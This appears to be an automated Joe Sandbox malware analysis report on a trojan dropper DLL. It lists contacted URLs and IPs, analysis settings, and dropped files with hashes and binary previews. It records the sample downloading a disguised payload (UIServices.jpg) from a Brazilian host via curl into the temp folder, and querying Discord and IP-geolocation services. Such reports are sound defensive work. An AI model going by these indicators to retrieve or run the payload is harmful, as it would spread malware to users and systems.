              https://discord.com/api/v10/guildshttps://discord.com/api/v10/invites/expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://github.com/serenity-rs/serenity0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                high
                http://ipwhois.app/json/0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                • Avira URL Cloud: safe
                unknown
                http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%cmd.exe, 00000005.00000002.258487106.000001E808BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.257861385.0000021271D60000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.265592954.000001E1230F0000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://discord.com/api/v10/voice/regionshttps://discord.com/api/v10/webhooks/0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://discord.com/expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                  • URL Reputation: safe
                  unknown
                  https://curl.se/docs/alt-svc.htmlexpand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                  • URL Reputation: safe
                  unknown
                  https://discord.com/api/v10/guilds/iconbannerjoined_atstring0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://discord.com/api/v10/interactions//callbackexpand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ipapi.co//json/0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                    high
                    https://discord.com/DDiscordBotexpand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://status.discord.com/api/v2/incidents/unresolved.jsonhttps://status.discord.com/api/v2/schedul0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://curl.se/docs/hsts.htmlexpand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                    • URL Reputation: safe
                    unknown
                    https://discord.com/api/v10/oauth2/applications/0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://freegeoip.app/json/Xexpand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e006e0061007600UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://discord.com/api/v10/channels/expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://discord.com/api/v10/sticker-packshttps://discord.com/api/v10/users/0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ip-api.com/json/0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                      high
                      https://freegeoip.app/json/expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://discord.com/api/v10/applications//commands/0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e00630068006500UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:curl.exe, 00000009.00000002.258205394.0000017782120000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.257455250.000001840CB40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.265327619.00000237F57C0000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://discord.com/api/v10/stage-instanceshttps://discord.com/api/v10/stage-instances/0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://docs.rs/getrandom#nodejs-es-module-supportCallingexpand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          191.252.51.12
                          anydesk10.hospedagemdesites.wsBrazil
                          27715LocawebServicosdeInternetSABRfalse
                          IP
                          192.168.2.1
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:756307
                          Start date and time:2022-11-30 00:36:14 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 10m 44s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Run name:Run with higher sleep bypass
                          Number of analysed new started processes analysed:63
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal52.troj.evad.winDLL@83/61@3/2
                          EGA Information:
                          • Successful, ratio: 33.3%
                          HDC Information:
                          • Successful, ratio: 72% (good quality ratio 65.9%)
                          • Quality average: 73.3%
                          • Quality standard deviation: 30.7%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .dll
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 8.241.126.121, 8.241.126.249, 8.238.85.126, 67.27.157.126, 8.248.139.254, 67.27.159.126, 8.241.121.126, 67.26.137.254, 8.248.117.254, 8.241.122.126
                          • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
                          • Execution Graph export aborted for target UIServices.exe, PID 3928 because there are no executed function
                          • Execution Graph export aborted for target UIServices.exe, PID 5736 because there are no executed function
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtEnumerateKey calls found.
                          • Report size getting too big, too many NtOpenKey calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          191.252.51.12View Payment 2020.exeGet hashmaliciousBrowse
                          • lifesuporte1.hospedagemdesites.ws/Send2/Ass.txt
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          LocawebServicosdeInternetSABR#U260e#Ufe0f vm_6316080857_20220526 (1).htmGet hashmaliciousBrowse
                          • 191.252.144.80
                          Thomas Anderson 9562 Cgs.htmGet hashmaliciousBrowse
                          • 191.252.144.80
                          SDQb9uiEp9.elfGet hashmaliciousBrowse
                          • 191.252.96.241
                          Modulo.msiGet hashmaliciousBrowse
                          • 186.202.13.35
                          imguser.dllGet hashmaliciousBrowse
                          • 179.188.11.20
                          imgengine.dllGet hashmaliciousBrowse
                          • 179.188.11.20
                          Linux_amd64Get hashmaliciousBrowse
                          • 186.202.153.161
                          https://decorcolors.com.brGet hashmaliciousBrowse
                          • 186.202.153.184
                          dekont.pdf.exeGet hashmaliciousBrowse
                          • 191.252.212.126
                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                          • 191.252.212.126
                          apS1A7df37.elfGet hashmaliciousBrowse
                          • 177.153.92.89
                          file.dllGet hashmaliciousBrowse
                          • 189.126.111.200
                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                          • 191.252.212.126
                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                          • 191.252.212.126
                          dekont.exeGet hashmaliciousBrowse
                          • 191.252.212.126
                          Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousBrowse
                          • 191.252.212.126
                          CTM REQUEST-ETD OCTOBER 22, 2022_pdf.exeGet hashmaliciousBrowse
                          • 191.252.123.161
                          E-Dekont.pdf.exeGet hashmaliciousBrowse
                          • 191.252.212.126
                          L8Mnuw2Bmh.elfGet hashmaliciousBrowse
                          • 179.188.154.116
                          Gk7FgnW13f.elfGet hashmaliciousBrowse
                          • 179.188.242.118
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmp4xkXHjUHJN.msiGet hashmaliciousBrowse
                            Tw9XaCvXwG.exeGet hashmaliciousBrowse
                              axQABMkG5H.msiGet hashmaliciousBrowse
                                SecuriteInfo.com.Heuristic.HEUR.AGEN.1253469.14711.357.exeGet hashmaliciousBrowse
                                  25z4YRgeJM.exeGet hashmaliciousBrowse
                                    25z4YRgeJM.exeGet hashmaliciousBrowse
                                      C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\vcruntime140.dll (copy)4xkXHjUHJN.msiGet hashmaliciousBrowse
                                        Tw9XaCvXwG.exeGet hashmaliciousBrowse
                                          axQABMkG5H.msiGet hashmaliciousBrowse
                                            SecuriteInfo.com.Heuristic.HEUR.AGEN.1253469.14711.357.exeGet hashmaliciousBrowse
                                              25z4YRgeJM.exeGet hashmaliciousBrowse
                                                25z4YRgeJM.exeGet hashmaliciousBrowse
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):778
                                                  Entropy (8bit):3.2569622051564373
                                                  Encrypted:false
                                                  SSDEEP:12:Qw5SQGkFNwallkQcGu1SQGkFNwallkQcGu1SQGkFNwallkQcGuXK0/B:Qkg8lloJ1g8lloJ1g8lloJR/B
                                                  MD5:46EA4744335C356461695433A9B322D3
                                                  SHA1:69D9124F61652D17BD4AA8FE910B528CA0A4E7C1
                                                  SHA-256:3ED0958ECB16FA52EB35ADC5E07B413DA555AFEDDB6F59442C25F9AC4B930EEA
                                                  SHA-512:82348A77EEE82AD581ED357DF242FEC36C4921338FA767E78A7562748A9AC21374C90BAB3AE1BCE02BC05F287D6452FB465F461661D742B38BC55B76EA3BEC7B
                                                  Malicious:false
                                                  Preview:..E.r.r.o.r. .1.5.0.0... .A.n.o.t.h.e.r. .i.n.s.t.a.l.l.a.t.i.o.n. .i.s. .i.n. .p.r.o.g.r.e.s.s... .Y.o.u. .m.u.s.t. .c.o.m.p.l.e.t.e. .t.h.a.t. .i.n.s.t.a.l.l.a.t.i.o.n. .b.e.f.o.r.e. .c.o.n.t.i.n.u.i.n.g. .t.h.i.s. .o.n.e.......E.r.r.o.r. .1.5.0.0... .A.n.o.t.h.e.r. .i.n.s.t.a.l.l.a.t.i.o.n. .i.s. .i.n. .p.r.o.g.r.e.s.s... .Y.o.u. .m.u.s.t. .c.o.m.p.l.e.t.e. .t.h.a.t. .i.n.s.t.a.l.l.a.t.i.o.n. .b.e.f.o.r.e. .c.o.n.t.i.n.u.i.n.g. .t.h.i.s. .o.n.e.......E.r.r.o.r. .1.5.0.0... .A.n.o.t.h.e.r. .i.n.s.t.a.l.l.a.t.i.o.n. .i.s. .i.n. .p.r.o.g.r.e.s.s... .Y.o.u. .m.u.s.t. .c.o.m.p.l.e.t.e. .t.h.a.t. .i.n.s.t.a.l.l.a.t.i.o.n. .b.e.f.o.r.e. .c.o.n.t.i.n.u.i.n.g. .t.h.i.s. .o.n.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.1./.3.0./.2.0.2.2. . .0.:.3.8.:.4.8. .=.=.=.....
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1006
                                                  Entropy (8bit):3.2288430235557075
                                                  Encrypted:false
                                                  SSDEEP:24:Qkg8lloJ1g8lloJ1g8lloJ1g8lloJR/cH:hguloJ1guloJ1guloJ1guloJSH
                                                  MD5:DE9A0A76204DD19CF3B390F68AD59B02
                                                  SHA1:D0C7D13A5545F8ACAC8C470652E210E2020D5843
                                                  SHA-256:D603AA9474CD94905F55194B6E198F07F918799CC1411B37798A1DA4C95BFADD
                                                  SHA-512:1CB64AE3C56E315FDD47DACB667F658B2BD668234BCA08C6A54C4BDB223169877ED3A26058B9251812DECA52811C8A2E4C6D0C848AF9030F4FA1A859869D01BA
                                                  Malicious:false
                                                  Preview:..E.r.r.o.r. .1.5.0.0... .A.n.o.t.h.e.r. .i.n.s.t.a.l.l.a.t.i.o.n. .i.s. .i.n. .p.r.o.g.r.e.s.s... .Y.o.u. .m.u.s.t. .c.o.m.p.l.e.t.e. .t.h.a.t. .i.n.s.t.a.l.l.a.t.i.o.n. .b.e.f.o.r.e. .c.o.n.t.i.n.u.i.n.g. .t.h.i.s. .o.n.e.......E.r.r.o.r. .1.5.0.0... .A.n.o.t.h.e.r. .i.n.s.t.a.l.l.a.t.i.o.n. .i.s. .i.n. .p.r.o.g.r.e.s.s... .Y.o.u. .m.u.s.t. .c.o.m.p.l.e.t.e. .t.h.a.t. .i.n.s.t.a.l.l.a.t.i.o.n. .b.e.f.o.r.e. .c.o.n.t.i.n.u.i.n.g. .t.h.i.s. .o.n.e.......E.r.r.o.r. .1.5.0.0... .A.n.o.t.h.e.r. .i.n.s.t.a.l.l.a.t.i.o.n. .i.s. .i.n. .p.r.o.g.r.e.s.s... .Y.o.u. .m.u.s.t. .c.o.m.p.l.e.t.e. .t.h.a.t. .i.n.s.t.a.l.l.a.t.i.o.n. .b.e.f.o.r.e. .c.o.n.t.i.n.u.i.n.g. .t.h.i.s. .o.n.e.......E.r.r.o.r. .1.5.0.0... .A.n.o.t.h.e.r. .i.n.s.t.a.l.l.a.t.i.o.n. .i.s. .i.n. .p.r.o.g.r.e.s.s... .Y.o.u. .m.u.s.t. .c.o.m.p.l.e.t.e. .t.h.a.t. .i.n.s.t.a.l.l.a.t.i.o.n. .b.e.f.o.r.e. .c.o.n.t.i.n.u.i.n.g. .t.h.i.s. .o.n.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.1./.3.0./.2.0.2.2. . .0.:.3.8.:.2.3. .=.=.
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986, number 1, 175 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):2465794
                                                  Entropy (8bit):7.999864847703612
                                                  Encrypted:true
                                                  SSDEEP:49152:PBdidvJXFzhYsAdZYH4YwKw2oHUNgir2MYgoGLcOh0YdMsyRyIQwF:PBxZtYDWHUNgiazgowjzu1QwF
                                                  MD5:97AF5456199BE2890D17BD4F166ADD0E
                                                  SHA1:4CD664992D1C04B2E2F65F9EF1C8C5B295687ADD
                                                  SHA-256:96AFCA733A419F2C4A5DEA6E7569125842477E7300ED9DA8553854A7B11DAD6C
                                                  SHA-512:DECE5558442E898750487B5A2ACA1CA3A2B165D675BB3703A1B8FF5BA88C581B2E6E15DC1DF62B585FF37F3354D047C8FA2B0E723B37FFB0684CDB89044E2471
                                                  Malicious:false
                                                  Preview:MSCF......%.....,..............."u..l.........U.......{U6. .UIServices.exe. .....U....Q.P .vcruntime140.dll..K.7.:..[...@. ......5..N....o..Z.hH...i..._.E.S..D.....F.E..<./..p..R-.......Z...jd..H......{...L...l.M..~..}&.4...Z.......GT.s-j.Q.@p.U..0.m..[1cF..F).a.X...(.^.U........E.....K..Z.........#.UEeV@.{.........9....{.7..7..0evYB..F"......P...P.X..e.....P..p..H.....o.B.A...zqp....+.(!... b..N...w.s...G.....0T...YGB..u..BL.!+KC...".a.......".0.fvvx......6.^/...;..^...m.**...).q..u.V.9IizF+}.d.gR.q@.....<\.=.Z.v.........C.I..4.\3.(..^;l.."...q.....,.v..........x.......5...@.E.#."..3.8.O..j@.|....j....;.G8..s...g}$.G@...Y..8...{\**27.j...~...2.V.4..X.......P..t.z\.?ht..^&G..O/S]|.R..fT.E.s.v*"...Q....PE|%..g.@...:......p..;...~d.B..E........K;TF.... X:.~C..x(-.:..W..WQ.rs..........jmPRG4.......P!g...'....*....,.*F..7...f~(..z...O.6}.....I.?.".#.aI6..E..zE....DN..N...D...n2.Gd..Vg..z&.)-<U;......>.AGQjL.X,1..F.6u.f..e\]CK.aE..[9.c...(....d../j.
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):101664
                                                  Entropy (8bit):6.571798459921823
                                                  Encrypted:false
                                                  SSDEEP:1536:sC6b39cL/iRDhXq4GZLAy10i5XNC83tTPw98APXbxecbSQ25I4I/Cq:sVPphXq30yvXL5APbxecbSDu
                                                  MD5:7A2B8CFCD543F6E4EBCA43162B67D610
                                                  SHA1:C1C45A326249BF0CCD2BE2FBD412F1A62FB67024
                                                  SHA-256:7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
                                                  SHA-512:E38304FB9C5AF855C1134F542ADF72CDE159FAB64385533EAFA5BB6E374F19B5A29C0CB5516FC5DA5C0B5AC47C2F6420792E0AC8DDFF11E749832A7B7F3EB5C8
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: 4xkXHjUHJN.msi, Detection: malicious, Browse
                                                  • Filename: Tw9XaCvXwG.exe, Detection: malicious, Browse
                                                  • Filename: axQABMkG5H.msi, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Heuristic.HEUR.AGEN.1253469.14711.357.exe, Detection: malicious, Browse
                                                  • Filename: 25z4YRgeJM.exe, Detection: malicious, Browse
                                                  • Filename: 25z4YRgeJM.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!/.NeNl.eNl.eNl....gNl.l6..nNl.eNm.INl..>o.hNl..>h.uNl..>i.zNl..>l.dNl..>..dNl..>n.dNl.RicheNl.................PE..d....Y._.........." .........^......p.....................................................`A........................................`1..4....9.......p.......P.......L.. A..........H...T...............................0............................................text............................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):5609472
                                                  Entropy (8bit):6.57517312270674
                                                  Encrypted:false
                                                  SSDEEP:49152:g2xSVi6to3D8COYcboaLKCIwfwqnD3qfv6Nr4NdHAaeb/s46VxQ0GigqU1DUpsFu:hxS+rc2Szaf3zXqBErS+
                                                  MD5:F65B1FC89A4324BEFDB6F24406BAEF6A
                                                  SHA1:BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9
                                                  SHA-256:E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
                                                  SHA-512:EEA285E51EE1B3FC42679C0DCB2CDD73E984DE29FD74A39BEFB1C51AD303CC0026F57A12A036E5F6905386DD5281C53B671F2FDE7B00F832297BF756635A0505
                                                  Malicious:false
